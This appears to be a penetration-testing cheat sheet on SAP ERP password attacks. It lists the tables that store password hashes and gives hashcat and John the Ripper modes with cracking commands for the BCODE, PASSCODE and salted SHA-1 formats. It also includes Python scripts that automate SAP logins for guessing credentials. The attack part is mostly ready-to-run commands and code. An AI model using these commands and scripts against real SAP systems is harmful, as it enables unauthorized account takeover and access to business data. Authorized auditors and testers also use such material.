SAP – ERP Software

SAP is a German software company that develops enterprise software to manage business operations and customer relations. SAP is best known for its ERP (Enterprise Resource Planning) software, which integrates various business functions, such as finance, human resources, procurement, manufacturing into a unified system.

Users & Passwords

The passwords of all SAP users are stored encrypted as hash values in transparent tables on the database. These tables are:

  • USR02: Contains the current user master record including the hash value(s) of the active password. USR02 is a standard SAP Table which is used to store Logon Data (Kernel-Side Use) data and is available within R/3 SAP systems depending on the version and release level.
  • USH02: Contains the change documents for the user master records including the hash value(s) of former SAP passwords
  • USRPWDHISTORY: Contains the user password history of every user
  • USH02_ARC_TMP: Used temporarily during archiving of user change documents

Bruteforce password

If you get access to the USR02 table, extract username and hashes.

SAP CODVN B (BCODE)

💡 BCODE is faster to crack than PASSCODE (SHA1, 160 Bit).
💡 BCODE is always UPPERCASE!
💡 BCODE is truncated to 8 characters.
The current password (PWDSALTEDHASH) may contain lowercase and longer than 8 characters.

Hash format for Hashcat (type 7700) and John (–format=sapb) is “<BNAME>$<BCODE>”. When Central User Administration (CUA) module is installed (deprecated), BCODE is required. Used when SAP parameter “login/password_downwards_compatibility” is NOT 0 (enabled from 1 to 5).

❗ You need to replace “USER” in the hash file by the real username found in the table (BNAME) or the password will NOT be cracked.

USER$C8B48F26B87B7EA7

Example for 8 characters, exclude lowercase since BCODE is always uppercase

hashcat -m 7700 -a 3 $HASH -1 ?u?d?s ?1?1?1?1?1?1?1?1

SAP CODVN F/G (PASSCODE)

Hash format for Hashcat (type 7800) and John (–format=sapg) is “<BNAME>$<PASSCODE>”. PASSCODE is case sensitive (unlike BCODE).

❗ You need to replace “USER” in the hash file by the real username found in the table (BNAME) or the password will NOT be cracked.

USER$ABCAD719B17E7F794DF7E686E563E9E2D24DE1D0

If you cracked BCODE (always uppercase), crack PASSCODE for real password case:

hashcat -m 7800 hash-passcode.txt bcode-password.txt -r /usr/share/hashcat/rules/toggles5.rule

SAP CODVN H (PWDSALTEDHASH) iSSHA-1

Hash format for Hashcat (type 10300) and John (–format=saph) is “<PWDSALTEDHASH>” (do NOT include username BNAME). PWDSALTEDHASH is case sensitive (unlike BCODE).

{x-issha, 1024}BnjXMqcNTwa3BzdnUOf1iAu6dw02NzU4MzE2MTA=

Automation using Netweaver SDK and pyrfc

#!/usr/bin/python3
#---------------------------------------------------------------------
# Author      : Lisandre.com
# Prereq      : Install SAP NW RFC SDK, download from SAP support portal
#               pip install pyrfc
#---------------------------------------------------------------------
import time
from pyrfc import Connection

# CONFIGURATIONS, UPDATE THIS SECTION, LOOK UPPER RIGHT CORNER IN SAP FOR SID & MANDANT
sap_sid = "P01" # 3 characters, uppercase, unique ID for a server
sap_mandant = "123"
server = "sap.example.com"
instance = "01"

#---------------------------------------------------------------------
# Login to SAP using credentials provided
#---------------------------------------------------------------------
def login(reqNumber, username, password):
    try:
        conn = Connection(user=username, passwd=password, ashost=server, sysnr=instance, client=sap_mandant)
        time.sleep(2)
        conn.close()
    except Exception as e:
        print(e)

#---------------------------------------------------------------------
# Log in
#---------------------------------------------------------------------
login(1, "test","test")

Automation using SAP GUI

#!/usr/bin/python3
#---------------------------------------------------------------------
# Author      : Lisandre.com
# Prereq      : SAP GUI installed, with scripting enabled
#               pip pywin32
#---------------------------------------------------------------------
import subprocess
import time
import os
import win32com.client

# CONFIGURATIONS, UPDATE THIS SECTION, LOOK UPPER RIGHT CORNER IN SAP FOR SID & MANDANT
sap_sid = "P01" # 3 characters, uppercase, unique ID for a server
sap_mandant = "123"
sap_exe = "C:\Program Files (x86)\...\sapshcut.exe"

#---------------------------------------------------------------------
# Login to SAP using credentials provided
#---------------------------------------------------------------------
def login(username, password):
    try:
        sp = subprocess.run([sap_exe, '-system=' + sap_sid, '-client=' + sap_mandant, '-user=' + username, '-pw=' + password])
        time.sleep(2)

    except subprocess.CalledProcessError as error:
        print(error)

#---------------------------------------------------------------------
# Log in
#---------------------------------------------------------------------
login("test","test")